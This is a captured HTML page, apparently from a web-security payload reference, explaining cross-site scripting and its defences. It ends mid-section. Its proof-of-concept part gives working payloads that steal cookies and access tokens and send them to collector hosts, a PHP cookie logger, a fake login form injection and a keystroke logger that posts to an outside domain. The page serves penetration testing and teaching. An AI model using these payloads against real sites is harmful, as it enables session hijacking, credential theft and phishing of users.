<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../File%20Inclusion/LFI-to-RCE/" class="md-nav__link">
<span class="md-ellipsis">
LFI to RCE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../File%20Inclusion/Wrappers/" class="md-nav__link">
<span class="md-ellipsis">
Inclusion Using Wrappers
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Headless Browser
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Headless Browser
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Headless%20Browser/" class="md-nav__link">
<span class="md-ellipsis">
Headless Browser
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" checked>
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Cross Site Scripting
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#methodology" class="md-nav__link">
<span class="md-ellipsis">
Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#proof-of-concept" class="md-nav__link">
<span class="md-ellipsis">
Proof of Concept
</span>
</a>
<nav class="md-nav" aria-label="Proof of Concept">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#data-grabber" class="md-nav__link">
<span class="md-ellipsis">
Data Grabber
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#cors" class="md-nav__link">
<span class="md-ellipsis">
CORS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ui-redressing" class="md-nav__link">
<span class="md-ellipsis">
UI Redressing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#javascript-keylogger" class="md-nav__link">
<span class="md-ellipsis">
Javascript Keylogger
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#other-ways" class="md-nav__link">
<span class="md-ellipsis">
Other Ways
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#identify-an-xss-endpoint" class="md-nav__link">
<span class="md-ellipsis">
Identify an XSS Endpoint
</span>
</a>
<nav class="md-nav" aria-label="Identify an XSS Endpoint">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-htmlapplications" class="md-nav__link">
<span class="md-ellipsis">
XSS in HTML/Applications
</span>
</a>
<nav class="md-nav" aria-label="XSS in HTML/Applications">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#common-payloads" class="md-nav__link">
<span class="md-ellipsis">
Common Payloads
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-using-html5-tags" class="md-nav__link">
<span class="md-ellipsis">
XSS using HTML5 tags
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-using-a-remote-js" class="md-nav__link">
<span class="md-ellipsis">
XSS using a remote JS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-hidden-input" class="md-nav__link">
<span class="md-ellipsis">
XSS in Hidden Input
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-uppercase-output" class="md-nav__link">
<span class="md-ellipsis">
XSS in Uppercase Output
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dom-based-xss" class="md-nav__link">
<span class="md-ellipsis">
DOM Based XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-js-context" class="md-nav__link">
<span class="md-ellipsis">
XSS in JS Context
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-wrappers-for-uri" class="md-nav__link">
<span class="md-ellipsis">
XSS in Wrappers for URI
</span>
</a>
<nav class="md-nav" aria-label="XSS in Wrappers for URI">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#wrapper-javascript" class="md-nav__link">
<span class="md-ellipsis">
Wrapper javascript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wrapper-data" class="md-nav__link">
<span class="md-ellipsis">
Wrapper data
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wrapper-vbscript" class="md-nav__link">
<span class="md-ellipsis">
Wrapper vbscript
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-files" class="md-nav__link">
<span class="md-ellipsis">
XSS in Files
</span>
</a>
<nav class="md-nav" aria-label="XSS in Files">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xss-in-xml" class="md-nav__link">
<span class="md-ellipsis">
XSS in XML
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-svg" class="md-nav__link">
<span class="md-ellipsis">
XSS in SVG
</span>
</a>
<nav class="md-nav" aria-label="XSS in SVG">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#short-svg-payload" class="md-nav__link">
<span class="md-ellipsis">
Short SVG Payload
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#nesting-svg-and-xss" class="md-nav__link">
<span class="md-ellipsis">
Nesting SVG and XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-markdown" class="md-nav__link">
<span class="md-ellipsis">
XSS in Markdown
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-css" class="md-nav__link">
<span class="md-ellipsis">
XSS in CSS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-postmessage" class="md-nav__link">
<span class="md-ellipsis">
XSS in PostMessage
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-xss" class="md-nav__link">
<span class="md-ellipsis">
Blind XSS
</span>
</a>
<nav class="md-nav" aria-label="Blind XSS">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xss-hunter" class="md-nav__link">
<span class="md-ellipsis">
XSS Hunter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#other-blind-xss-tools" class="md-nav__link">
<span class="md-ellipsis">
Other Blind XSS tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-xss-endpoint" class="md-nav__link">
<span class="md-ellipsis">
Blind XSS endpoint
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tips" class="md-nav__link">
<span class="md-ellipsis">
Tips
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mutated-xss" class="md-nav__link">
<span class="md-ellipsis">
Mutated XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="1%20-%20XSS%20Filter%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
XSS Filter Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="2%20-%20XSS%20Polyglot/" class="md-nav__link">
<span class="md-ellipsis">
Polyglot XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="3%20-%20XSS%20Common%20WAF%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Common WAF Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="4%20-%20CSP%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
CSP Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="5%20-%20XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_60" >
<label class="md-nav__link" for="__nav_60" id="__nav_60_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_60_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_60">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_61" >
<label class="md-nav__link" for="__nav_61" id="__nav_61_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_61_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_61">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_62" >
<label class="md-nav__link" for="__nav_62" id="__nav_62_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_62_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_62">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="cross-site-scripting">Cross Site Scripting</h1>
<blockquote>
<p>Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#methodology">Methodology</a></li>
<li><a href="#proof-of-concept">Proof of Concept</a><ul>
<li><a href="#data-grabber">Data Grabber</a></li>
<li><a href="#cors">CORS</a></li>
<li><a href="#ui-redressing">UI Redressing</a></li>
<li><a href="#javascript-keylogger">Javascript Keylogger</a></li>
<li><a href="#other-ways">Other Ways</a></li>
</ul>
</li>
<li><a href="#identify-an-xss-endpoint">Identify an XSS Endpoint</a><ul>
<li><a href="#tools">Tools</a></li>
</ul>
</li>
<li><a href="#xss-in-htmlapplications">XSS in HTML/Applications</a><ul>
<li><a href="#common-payloads">Common Payloads</a></li>
<li><a href="#xss-using-html5-tags">XSS using HTML5 tags</a></li>
<li><a href="#xss-using-a-remote-js">XSS using a Remote JS</a></li>
<li><a href="#xss-in-hidden-input">XSS in Hidden Input</a></li>
<li><a href="#xss-in-uppercase-output">XSS in Uppercase Output</a></li>
<li><a href="#dom-based-xss">DOM Based XSS</a></li>
<li><a href="#xss-in-js-context">XSS in JS Context</a></li>
</ul>
</li>
<li><a href="#xss-in-wrappers-for-uri">XSS in Wrappers for URI</a><ul>
<li><a href="#wrapper-javascript">Wrapper javascript:</a></li>
<li><a href="#wrapper-data">Wrapper data:</a></li>
<li><a href="#wrapper-vbscript">Wrapper vbscript:</a></li>
</ul>
</li>
<li><a href="#xss-in-files">XSS in Files</a><ul>
<li><a href="#xss-in-xml">XSS in XML</a></li>
<li><a href="#xss-in-svg">XSS in SVG</a></li>
<li><a href="#xss-in-markdown">XSS in Markdown</a></li>
<li><a href="#xss-in-css">XSS in CSS</a></li>
</ul>
</li>
<li><a href="#xss-in-postmessage">XSS in PostMessage</a></li>
<li><a href="#blind-xss">Blind XSS</a><ul>
<li><a href="#xss-hunter">XSS Hunter</a></li>
<li><a href="#other-blind-xss-tools">Other Blind XSS tools</a></li>
<li><a href="#blind-xss-endpoint">Blind XSS endpoint</a></li>
<li><a href="#tips">Tips</a></li>
</ul>
</li>
<li><a href="#mutated-xss">Mutated XSS</a></li>
<li><a href="#labs">Labs</a></li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="methodology">Methodology</h2>
<p>Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.</p>
<p>There are 3 main types of XSS attacks:</p>
<ul>
<li>
<p><strong>Reflected XSS</strong>: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.</p>
</li>
<li>
<p><strong>Stored XSS</strong>: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.</p>
</li>
<li>
<p><strong>DOM-based XSS</strong>: A DOM-based XSS attack occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code. Detection therefore relies on reviewing the client-side code, in particular where user-controlled values reach DOM-writing properties such as <code>innerHTML</code>.</p>
</li>
</ul>
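<p>To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code. The escaping must match the context in which the value is rendered (HTML body, attribute, JavaScript, or URL), and a Content Security Policy together with the <code>HttpOnly</code> cookie flag limits what an injected script can do if an escaping step is missed.</p>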
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>When exploiting an XSS vulnerability, it's more effective to demonstrate a complete exploitation scenario that could lead to account takeover or sensitive data exfiltration. Instead of simply reporting an XSS with an alert payload, aim to capture valuable data, such as payment information, personally identifiable information (PII), session cookies, or credentials.</p>
<h3 id="data-grabber">Data Grabber</h3>
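<p>To obtain the administrator cookie or a sensitive access token, the following payloads send it to a controlled page. Cookies set with the <code>HttpOnly</code> flag are not readable through <code>document.cookie</code>, so only cookies without that flag are exposed this way.</p>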
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://localhost/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://localhost/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">&#39;access_token&#39;</span><span class="p">)&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="ow">new</span><span class="w"> </span><span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;http://localhost/cookie.php?c=&quot;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="ow">new</span><span class="w"> </span><span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;http://localhost/cookie.php?c=&quot;</span><span class="o">+</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">&#39;access_token&#39;</span><span class="p">);&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<p>Write the collected data into a file.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="nv">$cookie</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;c&#39;</span><span class="p">];</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="nv">$fp</span> <span class="o">=</span> <span class="nb">fopen</span><span class="p">(</span><span class="s1">&#39;cookies.txt&#39;</span><span class="p">,</span> <span class="s1">&#39;a+&#39;</span><span class="p">);</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="nb">fwrite</span><span class="p">(</span><span class="nv">$fp</span><span class="p">,</span> <span class="s1">&#39;Cookie:&#39;</span> <span class="o">.</span><span class="nv">$cookie</span><span class="o">.</span><span class="s2">&quot;</span><span class="se">\r\n</span><span class="s2">&quot;</span><span class="p">);</span>
<a id="__codelineno-1-5" name="__codelineno-1-5" href="#__codelineno-1-5"></a><span class="nb">fclose</span><span class="p">(</span><span class="nv">$fp</span><span class="p">);</span>
<a id="__codelineno-1-6" name="__codelineno-1-6" href="#__codelineno-1-6"></a><span class="cp">?&gt;</span>
</code></pre></div>
<h3 id="cors">CORS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="w"> </span><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;https://&lt;SESSION&gt;.burpcollaborator.net&#39;</span><span class="p">,</span><span class="w"> </span><span class="p">{</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="w"> </span><span class="nx">method</span><span class="o">:</span><span class="w"> </span><span class="s1">&#39;POST&#39;</span><span class="p">,</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="w"> </span><span class="nx">mode</span><span class="o">:</span><span class="w"> </span><span class="s1">&#39;no-cors&#39;</span><span class="p">,</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="w"> </span><span class="nx">body</span><span class="o">:</span><span class="w"> </span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="w"> </span><span class="p">});</span>
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<h3 id="ui-redressing">UI Redressing</h3>
<p>Leverage the XSS to modify the HTML content of the page in order to display a fake login form.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="nx">history</span><span class="p">.</span><span class="nx">replaceState</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;../../../login&#39;</span><span class="p">);</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">&quot;&lt;/br&gt;&lt;/br&gt;&lt;/br&gt;&lt;/br&gt;&lt;/br&gt;&lt;h1&gt;Please login to continue&lt;/h1&gt;&lt;form&gt;Username: &lt;input type=&#39;text&#39;&gt;Password: &lt;input type=&#39;password&#39;&gt;&lt;/form&gt;&lt;input value=&#39;submit&#39; type=&#39;submit&#39;&gt;&quot;</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>
<h3 id="javascript-keylogger">Javascript Keylogger</h3>
<p>Another way to collect sensitive data is to install a JavaScript keylogger.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="o">&lt;</span><span class="nx">img</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="w"> </span><span class="nx">onerror</span><span class="o">=</span><span class="s1">&#39;document.onkeypress=function(e){fetch(&quot;http://domain.com?k=&quot;+String.fromCharCode(e.which))},this.remove();&#39;</span><span class="o">&gt;</span>
</code></pre></div>
<h3 id="other-ways">Other Ways</h3>
<p>More exploits at <a href="http://www.xss-payloads.com/payloads-list.html?a#category=all">http://www.xss-payloads.com/payloads-list.html?a#category=all</a>:</p>
<ul>
<li><a href="https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/">Taking screenshots using XSS and the HTML5 Canvas</a></li>
<li><a href="http://www.gnucitizen.org/blog/javascript-port-scanner/">JavaScript Port Scanner</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html">Network Scanner</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html">.NET Shell execution</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/redirectform.js.html">Redirect Form</a></li>
<li><a href="http://www.xss-payloads.com/payloads/scripts/playmusic.js.html">Play Music</a></li>
</ul>
<h2 id="identify-an-xss-endpoint">Identify an XSS Endpoint</h2>
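<p>This payload opens the debugger in the developer console rather than triggering a popup alert box. The <code>debugger</code> statement only pauses execution while the browser's developer tools are open; otherwise it has no visible effect.</p>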
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="k">debugger</span><span class="p">;</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
</code></pre></div>
<p>Modern applications with content hosting can use <a href="https://security.googleblog.com/2012/08/content-hosting-for-modern-web.html">sandbox domains</a></p>
<blockquote>
<p>to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data.</p>
</blockquote>
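<p>For this reason, it's better to use <code>alert(document.domain)</code> or <code>alert(window.origin)</code> rather than <code>alert(1)</code> as the default XSS payload, in order to know in which scope the XSS is actually executing. Execution inside a sandbox domain generally has much lower impact than execution in the application's own origin, which matters when triaging the finding.</p>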
<p>Better payload replacing <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>:</p>
